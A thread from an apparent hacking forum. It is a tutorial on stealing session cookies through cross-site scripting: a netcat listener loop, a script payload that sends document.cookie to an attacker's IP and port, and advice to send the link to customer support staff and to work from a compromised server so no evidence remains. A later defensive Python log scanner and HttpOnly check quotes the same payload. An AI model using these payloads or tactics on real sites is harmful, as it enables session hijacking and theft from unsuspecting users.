
Thread: Fast and easy XSS exploitation with netcat

  1. #1

    Fast and easy XSS exploitation with netcat

    If you don't want to set up a whole website just for your XSS-Cookie-Stealing-Script, you can simply do this little trick.
    This Tutorial is a part of an XSS exploitation series, because I have noticed that you guys have no f*cking idea how to properly exploit XSS vulnerabilities.

    What you need:

    A Website that is vulnerable to XSS
    A PC with netcat, preferably Linux, but it also works on Windows
    Even better: Shell Access to some other Webserver
    Know how to port forward

    How to do it:

    1: Port Forwarding
    There are a bunch of tutorials on how to do this. Just forward any unreserved port to the PC where you want to set up your listener.
    2: Starting netcat.
    If you are on linux, I have a small script for you:
    PHP Code:
    # serve index.html (with a minimal HTTP status line) to every connection on port 1337, then loop
    while true; do { echo -e 'HTTP/1.1 200 OK\r\n'; cat index.html; } | nc -l -p 1337 -q 1; done
    This script will listen on port 1337 (use the port that you have forwarded) and serve anyone who connects with index.html, which can be anything you want.
    I recommend making index.html some error page, or something that redirects back to the original site or anywhere else.
    3: Crafting the XSS vector
    You want something that redirects the user to your page and gives you some info. Insert this script into the vulnerable page:
    PHP Code:
    However, sometimes the + character is parsed into a space, but then you can use

    PHP Code:
    <script>var one="http://attackerip:port/index.html?cookie=";var two=document.cookie;document.location=one.concat(two);</script> 
    and there you go.
    4: Using that:
    You won't want to have netcat up for a long time, only for a short cookie grab. Thus, for example while chatting with customer support etc., you can set up the listener and send them your crafted XSS link. They click it, and you get an HTTP GET request on your netcat screen, which shows the cookie and some other info. When you have that shit, you can close your netcat listener and use their cookie.
    The only trace is the IP, but you can avoid this by doing this whole thing on a shelled webserver.
    5: Real life example:
    Now I will show you a real life example of this method;
    I used this xss vuln:
    PHP Code: 
    Because the + was parsed, I used the following syntax as the attack vector:
    PHP Code:<script>var one="";var two=document.cookie;document.location=one.concat(two);</script>&x=0&y=0 
    Having crafted the vector, I set up my server and ran the vector in the browser on my other PC. On the server (my Raspberry Pi) this is what you see:

    (a little bit of censorship so you don't get too much info...)
    As you can see, I have the cookie now, and some information about the victim.
    When I am done, I can simply close the netcat listener and the evidence is gone.
    Use the cookie to login and you are fine.

    No webhosting service needed, evidence vanishes, and you get everything in no time

    That's it for today, cheers!
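As an added defensive example (not code from the original post): a check that flags the vector shape shown above when it appears in web-server access logs, plus a check for the HttpOnly flag, which stops document.cookie from exposing the session cookie in the first place. The log lines, IP addresses and cookie values are constructed for the example.

```python
import re
from urllib.parse import unquote_plus, urlsplit, parse_qsl

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
# Line 2 carries the post's vector URL-encoded inside the "q" parameter; line 3
# merely mentions document.cookie and must not be flagged.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /search?q=shoes HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /search?q=%3Cscript%3Evar+one%3D%22http%3A%2F%2F192.0.2.10%3A1337%2Findex.html%3Fcookie%3D%22%3Bvar+two%3Ddocument.cookie%3Bdocument.location%3Done.concat%28two%29%3B%3C%2Fscript%3E&x=0&y=0 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
203.0.113.9 - - [10/Oct/2023:13:56:02 +0000] "GET /help?topic=document.cookie+explained HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# The vector reads document.cookie and then assigns it to a location property.
# Requiring both halves keeps plain mentions of "document.cookie" out of the hits.
COOKIE_READ = re.compile(r'document\s*\.\s*cookie', re.I)
NAV_SINK = re.compile(r'(document|window)\s*\.\s*location|location\s*\.\s*(href|assign|replace)', re.I)


def find_cookie_exfil(log_text):
    """Return (client_ip, parameter, decoded_value) for each query parameter that
    carries a cookie-exfiltration payload. parse_qsl already turns '+' into a space
    (the quirk the post describes); a second unquote_plus catches double-encoding."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m.group('target')).query
        for name, value in parse_qsl(query, keep_blank_values=True):
            decoded = unquote_plus(value)
            if COOKIE_READ.search(decoded) and NAV_SINK.search(decoded):
                hits.append((m.group('ip'), name, decoded))
    return hits


def session_cookie_is_script_readable(set_cookie_header):
    """True when a Set-Cookie header lacks HttpOnly, i.e. document.cookie would
    hand the value to exactly the kind of script shown in the post."""
    attrs = [part.strip().lower() for part in set_cookie_header.split(';')[1:]]
    return 'httponly' not in attrs
```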

  2. #2
    This post is like a rainbow *Beautiful*

    Anyway great post!

  3. #3
    Quote Originally Posted by Optimus Prime View Post
    This post is like a rainbow *Beautiful*

    Anyway great post!
    Thanks Buddy!

